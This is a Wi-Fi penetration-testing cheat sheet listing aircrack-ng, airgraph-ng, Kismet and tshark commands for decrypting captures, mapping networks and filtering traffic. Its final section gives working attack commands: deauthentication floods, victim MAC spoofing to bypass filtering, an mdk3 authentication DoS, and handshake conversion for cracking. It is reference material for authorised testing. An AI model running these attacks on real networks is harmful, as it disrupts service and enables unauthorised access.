# Wifi - Additional Tricks and Tools
## Additional Aircrack-NG Tools
### Remove Wireless Headers
```powershell
airdecap-ng -b $AP_MAC open-network.cap
* -dec.cap: the output file, a copy of the capture with the wireless headers stripped
```
### Decrypt a WEP encrypted capture file
```powershell
airdecap-ng -w $WEP_KEY wep.cap
```
### Decrypt a WPA2 encrypted capture file
```powershell
airdecap-ng -e $AP_SSID -p $WPA_PASSWORD tkip.cap
```
### Remote Aircrack Suite
```powershell
airmon-ng start wlan0 3
airserv-ng -p 1337 -c 3 -d mon0
airodump-ng -c 3 --bssid $AP_MAC $HOST:$PORT
```
### Wireless Intrusion Detection System
> Requires the wireless key and the BSSID of the access point
```powershell
airmon-ng start wlan0 3
# create the at0 interface
airtun-ng -a $AP_MAC -w $WEP_KEY mon0
# the interface will auto decrypt packets
```
## Wireless Reconnaissance
> Uses the CSV file written by airodump-ng
CAPR - Client to AP Relationship Graph
```powershell
airgraph-ng -i wifu-01.csv -g CAPR -o wifu-capr.png
# color
- green: wpa
- yellow: wep
- red: open
- black: unknown
```
CPG - Client Probe Graph
```powershell
airgraph-ng -i wifu-01.csv -g CPG -o wifu-cpg.png
```
## Kismet
```powershell
kismet
[enter][enter]
[tab][close]
# Select a source and begin a monitoring
Kismet > Add source > wlan0 > Add
.nettxt: data
.pcapdump: wireshark format
```
```powershell
# giskismet: kismet inside a SQL database
> requires a GPS receiver
gpsd -n -N -D4 /dev/ttyUSB0
-N : foreground
-D : debugging level
# kismet will gather SSID and GPS location
giskismet -x kismet.netxml
# generate a kml file (Google Earth)
giskismet -q "select * from wireless" -o allaps.kml
giskismet -q "select * from wireless where Encryption='WEP'" -o wepaps.kml
```
## Other things
```powershell
# Find Hidden SSID
aireplay-ng -0 20 –a <BSSID> -c <VictimMac> mon0
# Mac Filtering
macchanger –-mac <VictimMac> wlan0mon
aireplay-ng -3 –b <BSSID> -h <FakedMac> wlan0mon
# MAC CHANGER
ifconfig wlan0mon down
macchanger –-mac <macVictima> wlan0mon
ifconfig wlan0mon up
# Deauth Global
aireplay-ng -0 0 -e hacklab -c FF:FF:FF:FF:FF:FF wlan0mon
# Authentication DoS Mode
mdk3 wlan0mon a -a $AP_MAC
# Tshark - Filter and display data
tshark -r Captura-02.cap -Y "eapol" 2>/dev/null
tshark -i wlan0mon -Y "wlan.fc.type_subtype==4" 2>/dev/null
tshark -r Captura-02.cap -Y "(wlan.fc.type_subtype==0x08 || wlan.fc.type_subtype==0x05 || eapol) && wlan.addr==20:34:fb:b1:c5:53" 2>/dev/null
# Convert .cap with handshake to .hccap
aircrack-ng -J network network.cap
```